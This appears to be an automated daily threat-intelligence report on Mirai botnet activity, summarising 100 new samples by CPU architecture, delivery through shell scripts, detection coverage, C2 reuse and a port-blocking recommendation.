Daily Summary
Mirai activity surged today with 100 new samples, a 75% increase over the 7-day average of 57. This marks the highest single-day count in the past week, driven primarily by ELF binaries targeting IoT architectures.
New Samples Detected
ELF files dominate at 55 samples, with 7 shell scripts, 4 x86 variants, and smaller counts for MIPS, SuperH, ARM6, and x86_64 architectures. Notably, the .mpsl and .mips samples (3 each) indicate ongoing focus on MIPS-based routers and IoT devices. The inclusion of the obscure .i architecture (1 sample) suggests minor experimentation or cross-compilation from non-standard toolchains.
Distribution Methods
Delivery is primarily through download-and-execute scripts (.sh files) that deploy the ELF payloads. The shell scripts likely target vulnerable telnet or SSH endpoints with weak credentials, a classic Mirai vector. The presence of .x86, .x86_64, and .arm6 samples suggests campaign operators are scanning for a wider range of host types, including servers and desktop systems.
Detection Rate
Current AV coverage for these variants is expected to be moderate. While Mirai signatures are well-known, the influx of 100 new samples, particularly for niche architectures like .i, .mpsl, and .sh4, may evade detection on lesser-used platforms. SOC teams should verify that endpoint detection rules cover the full spectrum of architectural variants.
C2 Infrastructure
No new C2 servers were observed today, indicating operators are reusing existing infrastructure. This may suggest a consolidation phase or a delayed deployment of new command channels.
7-Day Trend
Today’s 100 samples represent a sharp rise from the week’s average of 57, breaking a pattern of moderate activity. Earlier days likely hovered near the average, with today’s spike signaling an accelerated campaign.
Security Analysis
The surge in ELF samples, particularly the diversity of architectures, may indicate automated scanning and compilation against compromised devices rather than targeted distribution. The emphasis on .mpsl and .mips variants suggests operators are focusing on exploiting outdated firmware in networking equipment. Defensive recommendation: Immediately block outbound connections from non-essential IoT and embedded devices on ports 23 (Telnet) and 2222 (SSH), which are common Mirai infection vectors.